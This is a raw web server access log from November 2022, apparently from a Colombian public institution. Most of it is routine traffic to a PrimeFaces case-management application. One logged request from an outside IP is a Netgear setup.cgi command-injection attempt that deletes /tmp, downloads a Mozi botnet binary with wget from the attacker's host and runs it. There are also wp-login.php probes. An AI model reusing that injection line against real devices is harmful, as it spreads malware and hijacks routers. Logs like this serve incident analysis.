201.245.192.253 - - [02/Nov/2022:07:40:41 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 26615
201.245.192.253 - - [02/Nov/2022:07:40:41 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [02/Nov/2022:07:40:41 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [02/Nov/2022:07:40:41 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [02/Nov/2022:07:40:41 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [02/Nov/2022:07:40:41 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [02/Nov/2022:07:40:41 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [02/Nov/2022:07:40:41 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [02/Nov/2022:07:40:41 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
172.22.2.4 - - [02/Nov/2022:07:39:07 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [02/Nov/2022:07:40:48 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
201.245.192.253 - - [02/Nov/2022:07:40:48 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/registrarAnotacion.xhtml HTTP/1.1" 200 119571
201.245.192.253 - - [02/Nov/2022:07:40:49 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [02/Nov/2022:07:40:49 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [02/Nov/2022:07:40:49 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [02/Nov/2022:07:40:49 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [02/Nov/2022:07:40:49 -0500] "GET /sipse/faces/javax.faces.resource/dynamiccontent.properties?ln=primefaces&pfdrid=XjOR5%2F%2FfPAZAuY9TpWQeCiM0BhlXxYRBGKi%2FQcXXfeA%3D&pfdrid_c=false HTTP/1.1" 500 383
201.245.192.253 - - [02/Nov/2022:07:40:54 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 68116
201.245.192.253 - - [02/Nov/2022:07:40:56 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [02/Nov/2022:07:40:56 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [02/Nov/2022:07:40:56 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [02/Nov/2022:07:40:56 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [02/Nov/2022:07:40:56 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [02/Nov/2022:07:40:56 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1560
201.245.192.253 - - [02/Nov/2022:07:41:00 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 25781
27.45.36.151 - - [02/Nov/2022:07:41:06 -0500] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://27.45.36.151:36185/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 1019
201.245.192.253 - - [02/Nov/2022:07:41:17 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 33862
201.245.192.253 - - [02/Nov/2022:07:41:21 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 5853
201.245.192.253 - - [02/Nov/2022:07:41:29 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 5861
201.245.192.253 - - [02/Nov/2022:07:41:28 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41717
201.245.192.253 - - [02/Nov/2022:07:41:31 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43969
172.22.2.4 - - [02/Nov/2022:07:39:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
201.245.192.253 - - [02/Nov/2022:07:41:45 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 5857
201.245.192.253 - - [02/Nov/2022:07:42:02 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 5853
201.245.192.253 - - [02/Nov/2022:07:42:06 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 112939
201.245.192.253 - - [02/Nov/2022:07:42:06 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [02/Nov/2022:07:42:06 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [02/Nov/2022:07:42:06 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [02/Nov/2022:07:42:06 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [02/Nov/2022:07:42:07 -0500] "GET /sipse/faces/javax.faces.resource/dynamiccontent.properties?ln=primefaces&pfdrid=XjOR5%2F%2FfPAZAuY9TpWQeCiM0BhlXxYRBGKi%2FQcXXfeA%3D&pfdrid_c=false HTTP/1.1" 500 383
190.159.14.237 - - [02/Nov/2022:07:42:20 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
190.159.14.237 - - [02/Nov/2022:07:42:20 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
190.159.14.237 - - [02/Nov/2022:07:42:20 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
190.159.14.237 - - [02/Nov/2022:07:42:20 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12194
190.159.14.237 - - [02/Nov/2022:07:42:20 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.159.14.237 - - [02/Nov/2022:07:42:20 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.159.14.237 - - [02/Nov/2022:07:42:20 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.159.14.237 - - [02/Nov/2022:07:42:20 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.159.14.237 - - [02/Nov/2022:07:42:20 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.159.14.237 - - [02/Nov/2022:07:42:20 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.159.14.237 - - [02/Nov/2022:07:42:20 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
190.159.14.237 - - [02/Nov/2022:07:42:22 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 2224
190.159.14.237 - - [02/Nov/2022:07:42:22 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.159.14.237 - - [02/Nov/2022:07:42:24 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 16293
190.159.14.237 - - [02/Nov/2022:07:42:24 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
190.159.14.237 - - [02/Nov/2022:07:42:24 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.159.14.237 - - [02/Nov/2022:07:42:24 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.159.14.237 - - [02/Nov/2022:07:42:24 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.159.14.237 - - [02/Nov/2022:07:42:24 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.159.14.237 - - [02/Nov/2022:07:42:24 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.159.14.237 - - [02/Nov/2022:07:42:24 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.159.14.237 - - [02/Nov/2022:07:42:25 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
190.159.14.237 - - [02/Nov/2022:07:42:34 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
190.159.14.237 - - [02/Nov/2022:07:42:34 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 2658
190.159.14.237 - - [02/Nov/2022:07:42:35 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 66327
190.159.14.237 - - [02/Nov/2022:07:42:37 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
190.159.14.237 - - [02/Nov/2022:07:42:37 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.159.14.237 - - [02/Nov/2022:07:42:37 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.159.14.237 - - [02/Nov/2022:07:42:37 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.159.14.237 - - [02/Nov/2022:07:42:37 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.159.14.237 - - [02/Nov/2022:07:42:37 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.159.14.237 - - [02/Nov/2022:07:42:37 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.159.14.237 - - [02/Nov/2022:07:42:37 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1560
185.119.81.97 - - [02/Nov/2022:07:42:39 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
190.159.14.237 - - [02/Nov/2022:07:42:40 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 15530
185.119.81.97 - - [02/Nov/2022:07:42:40 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3650
216.245.221.92 - - [02/Nov/2022:07:43:35 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [02/Nov/2022:07:44:20 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41830
190.159.14.237 - - [02/Nov/2022:07:45:23 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 15581
172.22.2.4 - - [02/Nov/2022:07:44:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54823
190.159.14.237 - - [02/Nov/2022:07:46:13 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 15545
190.159.14.237 - - [02/Nov/2022:07:46:22 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 15551
190.159.14.237 - - [02/Nov/2022:07:46:27 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 15498
190.159.14.237 - - [02/Nov/2022:07:46:31 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 15486
201.245.192.253 - - [02/Nov/2022:07:46:36 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 389170
190.159.14.237 - - [02/Nov/2022:07:46:36 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 15597
172.22.2.4 - - [02/Nov/2022:07:44:57 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
190.159.14.237 - - [02/Nov/2022:07:46:40 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 15537
190.159.14.237 - - [02/Nov/2022:07:46:44 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 15545
190.159.14.237 - - [02/Nov/2022:07:46:50 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 15503
186.28.3.121 - - [02/Nov/2022:07:47:14 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 175074
186.102.31.23 - - [02/Nov/2022:07:47:23 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX190S0wKNJ/Kr8FCyuYgjCWwO+lHXCnFwAjTkdeQTvBdMJBRAbME3qaUoST3vHpHvkRWzk/bd+vRGw==&y=U2FsdGVkX19ihUjRtLRAA9SASJKVto5UaVi6oWk17+roNhQKGt5DrGrJg/gIQIVV HTTP/1.1" 200 30
186.102.31.23 - - [02/Nov/2022:07:47:23 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18rjPaiIjtdOO2aOpaALStuCECANdBc+Wxna259p44aE9DZFtAVwYFcO7k5/NlxusJi3X0m+3SAsYPE+pVYQNt7GF2pzQbUM6I=&u=U2FsdGVkX19w5WRo9f9SO7s6O/TLi99rXoc1EyXbn0qtNnG37W/sOQ9amWGqD4OB&y=U2FsdGVkX19ihUjRtLRAA9SASJKVto5UaVi6oWk17+roNhQKGt5DrGrJg/gIQIVV HTTP/1.1" 200 97
186.102.31.23 - - [02/Nov/2022:07:47:23 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19T6ZtSppMxnTBO3KiHrODYlKMKfXDJJp9xh+nJzJEffirbHJYeBWnESsuHXLLpD/7lMm9yxKQuamuigplARv0GvkR8H4yJyH9pMHwizJtbcoNYuuJr2IN26xNoiGGYVLTY5PRVOsV7sS1PyAjt1xk38+u0Z1Sd1kgjnAXYd3zUfRBxWzXhLmH/OvoFDYpo+8pLS+dkOm+7+NXOgcwMxPHCnIMNqJztOIrxH442Ji6wC5UmuSZyeaF23rukHazldTHkD2eMSDAD3fqYp+aQAJs57Kejxyew32jAOYEuH5mDaItmgGuZgpZ3k9Qn3qPaLDd5aLguQ4bsBEGDjsBOpeCurFXjNW8MTt0l0PEOKtematYkxiOrnf4av3LQfYuMPaTpfDzBgVyAWiY+WH5TPWpBBiQgkEcFd3/cUoIusD0PFTJNiC/wTbe3bZ35tDj/o+gBBao9Qf0dKltPJonLGqbxv23UHLXhMsjMQz64/DtRXeZyT9ofsfAU2XV/zbbcFOabU3pT8PNj8L8acWh0dAkm9iMTN2y4Ylar2hfZLqjI5Mnni4HdwVmDtfDOnNAEYvmY0Yb1UmY8eUIfiF6A49RPByUHb6vxde/V5Htn8Jj5lb8BtvGZpuDsxjqX3C6baN4/Ag/hJ25dsjYPQgrIDjy/OcgpnJB8PomIx1eyP9p5XtIWR680evj2qLU5s+OiarD7Ifhtb/RNm/d5EAmv7H1spSRXF3vpCe0ICfS33VYm17uOxkToTTZYePNMdyobYMZ3no2vej2OMWxU6qxdXbtEkKG7iUyX7dT73tVlMPI+pQ2RqjZQTFR6Qd0JMv/ODwMeAqUemDOJgEN3sMAj2EEx6JhHE3XDqePiZJeJXjCHNccSDIG7SbMFs9Drh6UNhdbkHIQU7hKWZ+tkjTuFKKndrX4/P/QmfMAfPmXTlxcY0L1eekKMZYR8P9hNZMT5ilk+3drnGyoyXGRzPO6d7AOl+tv0TNGWzeadUSESRfztT4nzjPJoLd2p3QRiKVyqTIFT6jlArXtLI8ujKhqqAoyL3uGi1MJKJJ7WjqxnwnAwKdkivN1ariU5+BCv7uW7YkUXMDquBuW6zjt6rhzKzH/5yyWRaMbH6WYxfYwDAoyoSeKwJuNDBjnG6mQ0MnccuhPB54+HUUb7bWkTCZOXkQc7tKiZ0jbWSgiNAdChAkApOxe++gp+iFlYBvod9bmAzg3z8MkjvoEwAHEQHKwzATq4857skjzJQeEWyZFFGWnE0gegRjfIdEPjVFnGaOR0begvRpJZuTQPq/LbxHoiFOwguQEL6tolyGhK0yd8o1mAxNzjss7nLrkMgCUrw5IIYIraFZo3+ABEqEtTga2VBTxm0ZtoPImBJF9Dhxa5uch1Lf4iBaqWu/Mtodce3HtyTnkhelaqUTGeJO/1UPQKyq8XD2VNMUgXtwY=&u=U2FsdGVkX19w5WRo9f9SO7s6O/TLi99rXoc1EyXbn0qtNnG37W/sOQ9amWGqD4OB&y=U2FsdGVkX19ihUjRtLRAA9SASJKVto5UaVi6oWk17+roNhQKGt5DrGrJg/gIQIVV HTTP/1.1" 200 8909
186.102.31.23 - - [02/Nov/2022:07:47:23 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19qVepzeZ9Wx7X36IdxjuAmqqwdC9zQsFSw/fyraePmoX7p/JhwmNWhBU56LmIuTJrCSS2T91NpDWjVnjHu2K20MS4Mht2RH1bPiPObHSdakFvJOrxhBn6h3aNyTh40PSoF9iRPJvaj7fZYJ8rqAc7HykIbINxZzvI2xrFKaDo+qx9Yy88+Qzm5qHouuEYJ3oGLmWcBJZuWqPBx/VEp9Q0pOIzoemT2avSFAffIMoTPE/5My8srg4uboNC4WwB4+SE3YmuS76s/ay4t4eGnFsncuKQlVxTFbvkAxCI2Bb8ntbwDM93l8iWCKjB2NMwO+2nSUft2y5VQDuqaDzNr/Yzw+vCAj9uCbEY=&u=U2FsdGVkX19w5WRo9f9SO7s6O/TLi99rXoc1EyXbn0qtNnG37W/sOQ9amWGqD4OB&y=U2FsdGVkX19ihUjRtLRAA9SASJKVto5UaVi6oWk17+roNhQKGt5DrGrJg/gIQIVV HTTP/1.1" 200 196
186.102.31.23 - - [02/Nov/2022:07:47:24 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX190S0wKNJ/Kr8FCyuYgjCWwO+lHXCnFwAjTkdeQTvBdMJBRAbME3qaUoST3vHpHvkRWzk/bd+vRGw== HTTP/1.1" 200 30992
172.22.2.4 - - [02/Nov/2022:07:45:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56376
190.159.14.237 - - [02/Nov/2022:07:47:37 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 15539
190.159.14.237 - - [02/Nov/2022:07:47:42 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 15513
186.102.31.23 - - [02/Nov/2022:07:47:43 -0500] "GET /kwssiamovil/sm/acme/u?s=U2FsdGVkX1+EhZwg5HBwFdQiWsRoDmtz1YyEzsRIqIb/Qv9Nv08oWZarri/3QvR0PBs4HPEqajOHgCGt2cPoRL8BC2Iwq5iPdPmUVQHyrJDJEf9+nqdrMCdv+12PWUXm6gM3F+qJPsBI6EWMjXusTg==&u=U2FsdGVkX19w5WRo9f9SO7s6O/TLi99rXoc1EyXbn0qtNnG37W/sOQ9amWGqD4OB&y=U2FsdGVkX19ihUjRtLRAA9SASJKVto5UaVi6oWk17+roNhQKGt5DrGrJg/gIQIVV HTTP/1.1" 200 60
190.159.14.237 - - [02/Nov/2022:07:47:48 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 15526
186.102.31.23 - - [02/Nov/2022:07:47:57 -0500] "GET /kwssiamovil/sm/acme/u?s=U2FsdGVkX1+zz3/3OLzZ2FmhvMVoJjvW0ReOQ/x8uYVP0iBrVsI2ZpfCa1RUexGUGo6hAx+yNIOCJ5aMISiLG3iUjOeA2IK2WmqM5bisiVna9kDcDSASE+RxOi/o4TooydJfHWq5ZrZKYHAgE4lCsg==&u=U2FsdGVkX19w5WRo9f9SO7s6O/TLi99rXoc1EyXbn0qtNnG37W/sOQ9amWGqD4OB&y=U2FsdGVkX19ihUjRtLRAA9SASJKVto5UaVi6oWk17+roNhQKGt5DrGrJg/gIQIVV HTTP/1.1" 200 60
190.159.14.237 - - [02/Nov/2022:07:48:00 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 15483
190.159.14.237 - - [02/Nov/2022:07:48:02 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 15495
190.159.14.237 - - [02/Nov/2022:07:48:07 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 15571
186.102.31.23 - - [02/Nov/2022:07:48:10 -0500] "GET /kwssiamovil/sm/acme/u?s=U2FsdGVkX1/zi94I2B/bzdXqSZP944i6f2JUabHM+88Bwud9fMH1PtuTfRjQ/mNgry/PatytB1x6ti7nNfIkkkwPlsSzp54GRB2KWR6Fl2hGlDo6yd4BXdSJ7XXaWjOhIcGD+kMSMZTMraQ4mZZBXQ==&u=U2FsdGVkX19w5WRo9f9SO7s6O/TLi99rXoc1EyXbn0qtNnG37W/sOQ9amWGqD4OB&y=U2FsdGVkX19ihUjRtLRAA9SASJKVto5UaVi6oWk17+roNhQKGt5DrGrJg/gIQIVV HTTP/1.1" 200 60
190.159.14.237 - - [02/Nov/2022:07:48:14 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 15578
190.159.14.237 - - [02/Nov/2022:07:48:17 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 15566
186.102.31.23 - - [02/Nov/2022:07:48:24 -0500] "GET /kwssiamovil/sm/acme/u?s=U2FsdGVkX195vFlDlSIDlCWBPrz7k0a5TgMA+geZRZFZ1VamyUmuFxVzAa17B5QAayvdLWFNqFf1I9xfgWkjTQnRRIxHHIevkYyk6velqYAxHCgA6WzKxS7OQgwExWIlQfaWPccYxRDWp5cEAzhJjg==&u=U2FsdGVkX19w5WRo9f9SO7s6O/TLi99rXoc1EyXbn0qtNnG37W/sOQ9amWGqD4OB&y=U2FsdGVkX19ihUjRtLRAA9SASJKVto5UaVi6oWk17+roNhQKGt5DrGrJg/gIQIVV HTTP/1.1" 200 60
216.245.221.92 - - [02/Nov/2022:07:48:35 -0500] "HEAD / HTTP/1.1" 200 -
186.102.31.23 - - [02/Nov/2022:07:48:36 -0500] "GET /kwssiamovil/sm/acme/u?s=U2FsdGVkX1/jtYn9fPlr8CmAp1u5TFbM90b67w+zXMU+5zh3vOL4YFETZM59jdaHBMV9+JR3boKVmUYatoEgMUlw5d9h25JVPrcNqCRRSX22xueWdh3m94/XJNv+MgM1BQwClMuk59cEkVhtvovygQ==&u=U2FsdGVkX19w5WRo9f9SO7s6O/TLi99rXoc1EyXbn0qtNnG37W/sOQ9amWGqD4OB&y=U2FsdGVkX19ihUjRtLRAA9SASJKVto5UaVi6oWk17+roNhQKGt5DrGrJg/gIQIVV HTTP/1.1" 200 60
186.102.31.23 - - [02/Nov/2022:07:48:50 -0500] "GET /kwssiamovil/sm/acme/u?s=U2FsdGVkX1+5EDEuiub94fGOWtk55K32KYTNt+lN+SLPy5Q+DV7hJQyn58RfxEM21vI23tYSt3mGQjPwnCeUB4rgtZI3RxRGO0Su1jZrBt7IARhshbxLSLn3oxqjM4kJKLSDqPQwGQF+D5Riq+bF0A==&u=U2FsdGVkX19w5WRo9f9SO7s6O/TLi99rXoc1EyXbn0qtNnG37W/sOQ9amWGqD4OB&y=U2FsdGVkX19ihUjRtLRAA9SASJKVto5UaVi6oWk17+roNhQKGt5DrGrJg/gIQIVV HTTP/1.1" 200 60
201.245.192.253 - - [02/Nov/2022:07:48:56 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 31706
201.245.192.253 - - [02/Nov/2022:07:48:56 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [02/Nov/2022:07:48:56 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [02/Nov/2022:07:48:56 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [02/Nov/2022:07:48:56 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [02/Nov/2022:07:48:56 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [02/Nov/2022:07:48:56 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [02/Nov/2022:07:48:56 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [02/Nov/2022:07:48:56 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.102.31.23 - - [02/Nov/2022:07:49:02 -0500] "GET /kwssiamovil/sm/acme/u?s=U2FsdGVkX1/g/UaXgIkcf0LpDE+eqfWHjQ0eM+sM31BN5xu7QdLTR4hh21EpZtoVS6aa1b0qW7t6SMm68lR1Jjorgk1ZkBdQrlO0RW7mWM920dmVktgEgnirskbMxDLyRM4jbodkF7cZLkL4MDtHMg==&u=U2FsdGVkX19w5WRo9f9SO7s6O/TLi99rXoc1EyXbn0qtNnG37W/sOQ9amWGqD4OB&y=U2FsdGVkX19ihUjRtLRAA9SASJKVto5UaVi6oWk17+roNhQKGt5DrGrJg/gIQIVV HTTP/1.1" 200 60
186.28.3.121 - - [02/Nov/2022:07:49:02 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 30843
186.28.3.121 - - [02/Nov/2022:07:49:03 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.28.3.121 - - [02/Nov/2022:07:49:03 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.28.3.121 - - [02/Nov/2022:07:49:03 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.28.3.121 - - [02/Nov/2022:07:49:03 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.28.3.121 - - [02/Nov/2022:07:49:03 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
